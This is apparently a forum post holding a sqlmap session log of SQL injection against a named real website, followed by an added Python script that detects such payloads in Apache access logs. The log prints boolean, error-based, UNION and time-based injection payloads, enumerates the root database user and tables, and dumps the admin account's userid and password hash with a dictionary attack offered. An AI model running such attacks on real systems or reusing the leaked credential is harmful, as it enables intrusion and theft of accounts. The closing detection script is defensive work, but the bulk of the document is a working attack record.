D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
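Added detection example, not part of the original post: the four injection techniques sqlmap reported above (boolean-based, error-based, UNION and time-based) all travel in the query string and therefore land in the web server's access log. The script below classifies Apache combined-format log lines by those payload signatures and by sqlmap's default User-Agent; the log lines, client address and timestamps are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four techniques listed in the sqlmap session above,
# applied to the URL-decoded query string (case-insensitive).
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),               # id=276 AND 799=799
    "error-based":   re.compile(r"FLOOR\(RAND\(0\)\*2\).*GROUP\s+BY", re.I), # duplicate-key error trick
    "union":         re.compile(r"UNION\s+ALL\s+SELECT\s+NULL", re.I),       # NULL-padded UNION probe
    "time-blind":    re.compile(r"\bSLEEP\(\d+\)", re.I),                     # id=276 AND SLEEP(5)
}

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def classify(line):
    """Return the signature names matching one access-log line (empty list if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Decode once, which is what PHP and then MySQL saw; keep only the query string.
    query = unquote_plus(m.group("url").partition("?")[2])
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if "sqlmap" in m.group("ua").lower():  # sqlmap's default User-Agent names the tool
        hits.append("sqlmap-user-agent")
    return hits

def scan(log_text):
    """Map 1-based line numbers to their matching signatures; clean lines are omitted."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings[n] = hits
    return findings

# Constructed sample log (not from the original post): one benign request, then one request per
# technique from the session above, with the payloads URL-encoded as a client would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404%3D8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 640 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,%20NULL,%20NULL,%20NULL,%20NULL,%20CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),%20NULL,%20NULL,%20NULL%23 HTTP/1.1" 200 5200 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
203.0.113.5 - - [01/Jan/2011:16:53:56 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"
"""

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(hits)}")
```

The User-Agent check only catches an unmodified sqlmap (the tool can randomise it), so the payload signatures are the durable part of the rule.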